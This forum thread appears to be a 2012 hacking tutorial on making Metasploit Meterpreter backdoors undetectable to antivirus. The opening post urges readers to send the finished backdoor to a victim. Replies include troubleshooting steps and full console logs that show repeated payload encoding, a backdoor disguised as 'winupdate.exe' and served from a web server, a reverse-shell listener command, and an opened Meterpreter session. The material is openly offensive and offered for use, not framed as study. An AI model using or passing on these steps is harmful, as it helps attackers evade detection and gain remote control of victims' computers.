Undetectable Backdoor Encoding with Metasploit Framework

[deathcorps]

Today we are gonna be encoding backdoors using metasploit framwork on Backtrack 5!

First we take a look at crafting a simple payload into a backdoor, and when loading it into a sandbox (Windows XP) the anti-virus doesn’t even allow the file to be downloaded.

Well, that’s not any good is it? Who’s gonna open the file if there are flags all over it?

So we have to make this file undetectable, at least to the client’s anti-virus which is Avast. Recently I found a public script in Pastebin and after looking at it for a few minutes, I thought the file was really legit. Especially after seeing all the encoding going on at line 43… so I modified it for my own use — big ups to Astrobaby, don’t know who you are or where you’re from but keep it up!

Run metasploit framework console, use the exploit/multi/handler method, and set the payload to windows/meterpreter/reverse_https. It is also a good idea to use the ‘launch_and_migrate.rb’ script, so we can migrate to a new process as soon as we get a chance. We encoded that backdoor like 1000 times so it can’t be that stable.

Now with an undetectable backdoor we just get creative and find a way to send it to the victim.

Video & Article: http://technicdynamic.com/2012/02/un...oit-framework/

Script download: http://technicdynamic.com/wp-content...02/scripts.zip

[m0j4h3d]

.. great post man
but what about this:

mv: cannot stat `final.exe': No such file or directory
final.c ...generated in seclabs subfolder
final.c sha1checksum is .. 1906ae3935857cb5f84606462f308cabb606fe51 final.c
strip:final.c: File format not recognized
starting the meterpreter listener...
Done! Now launch msfconsole > exploit/multi/handler

!!!!!

[deathcorps]

Yea, sorry about that! Forgot to mention you have to install these libs:

apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Try it then

[jonim]

11 / 42 Detect ratin AV :-((
It's not gud.
How it change to have very nice tools ?

[Manijak]

Same problem as m0j4h3d.

root@bt:/pentest/exploits/framework2# ./vanish.sh
************************************************** **********
Fully Undetectable Metasploit Payload generaor Beta
Original Concept and Script by Astr0baby
Stable Version of Script is Edited by Vanish3r
Video Tutorial by Vanish3r - www.securitylabs.in
Powered by TheHackerNews.com and securitylabs.in
************************************************** **********
Network Device On your Computer :
lo:
eth1:
Which Interface to use ? eth1
What Port Number are we gonna listen to? : 4444
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 5000
How many times you want to encode ? 1-20 : 10
Current Ip is : 192.168.227.128
Unknown option: c
Unknown option: c
Unknown option: c
Unknown option: c[*] Invalid encoder specified[*] Invalid encoder specified[*] Invalid encoder specified[*] Invalid encoder specified

Usage: ./msfpayload <payload> [var=val] <S|C|P|R|X>

Payloads:
bsd_ia32_bind BSD IA32 Bind Shell
bsd_ia32_bind_stg BSD IA32 Staged Bind Shell
bsd_ia32_exec BSD IA32 Execute Command
bsd_ia32_findrecv BSD IA32 Recv Tag Findsock Shell
.
.
.
mv: cannot stat `final.exe': No such file or directory
final.c ...generated in seclabs subfolder
final.c sha1checksum is .. 415f379b763391d4daa56459c68d2ff19e611b5e final.c
strip:final.c: File format not recognized
starting the meterpreter listener...
Done! Now launch msfconsole > exploit/multi/handler

and installed
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Anyone have suggestion? Running BT5R2 Gnome 32.

[zimmaro]

hi,manijak
the script worked fine! i'm use bt5-r2 too...if you have installed (todos migw32..ecc)try to copy vanish.sh in metasploit 4.3.0-dev directory!
/opt/metasploit/msf3 or create link then me /pentest/exploit/framework

oot@bt:~# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ls
armitage javaAttack.sh msfd msfpescan nul test
crypter.py lib msfelfscan msfrop plugins tools
data modules msfencode msfrpc README vanish.sh
documentation msfbinscan msfgui msfrpcd scripts
external msfcli msfmachscan msfupdate seclabs
HACKING msfconsole msfpayload msfvenom structure.c
root@bt:/pentest/exploits/framework# ./vanish.sh
# Automated Backdoor & Exploitation by astr0baby, vanish3r & deathc0rps
* Enter IP/DNS address: 192.168.1.122
* Enter port number: 4444
> Now, type a random number from 1~100000 for encoding purposes. DON'T SKIP!
* Enter random seed: 6000
* Encode how many times? [1-20]: 5
> Creating payload and encoding...[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)

> Payload created.
> Creating directory seclabs...
> Encoding and compiling, this might take a while...
backdoor.exe > ...finished compiling to folder: seclabs/
backdoor.exe > sha1checksum is... 77b8421777dd3e72fe724b01929e5a726483e8e0 backdoor.exe
> Copying the file to /var/www/ and creating update.zip
adding: winupdate.exe (deflated 52%)

NOW START APACHE2 SERVER & THE LISTENER....
root@bt:/pentest/exploits/framework#/etc/init.d/apache2 start
root@bt:/pentest/exploits/framework# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.122 E
(in the script is ##uncomment)
REDIRECT "VICTIM ON ""ATTACKER_WEB_SERVER"........................ ...& down/execute[*] Please wait while we load the module tree...
=[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 823 exploits - 467 auxiliary - 141 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
=[ svn r15075 updated yesterday (2012.04.06)

PAYLOAD => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 192.168.1.122[*] Started reverse handler on 192.168.1.122:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 192.168.1.4[*] Meterpreter session 1 opened (192.168.1.122:4444 -> 192.168.1.4:1523) at 2012-04-08 11:46:30 +0200

meterpreter > )
MORE AV DETECT THIS!!!!!!!!bye

[killtrace]

ok I go cd /pentest/exploits/framework2 (yes name of my folder is framework2 o.0) >ls> I can see vanish.sh I made it executable > ./vanish > interface:etho1 >port:4444 > random number 6000 > encode 5 > and same thing as manijak


mv: cannot stat `final.exe': No such file or directory
final.c ...generated in seclabs subfolder
final.c sha1checksum is .. ed36ca59436649e3d5516ee0a96c95ecbcf77a5e final.c
strip:final.c: File format not recognized
starting the meterpreter listener...
Done! Now launch msfconsole > exploit/multi/handler

and I have install all mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils and still I got this
I use backtrack 5 r2 gnome x64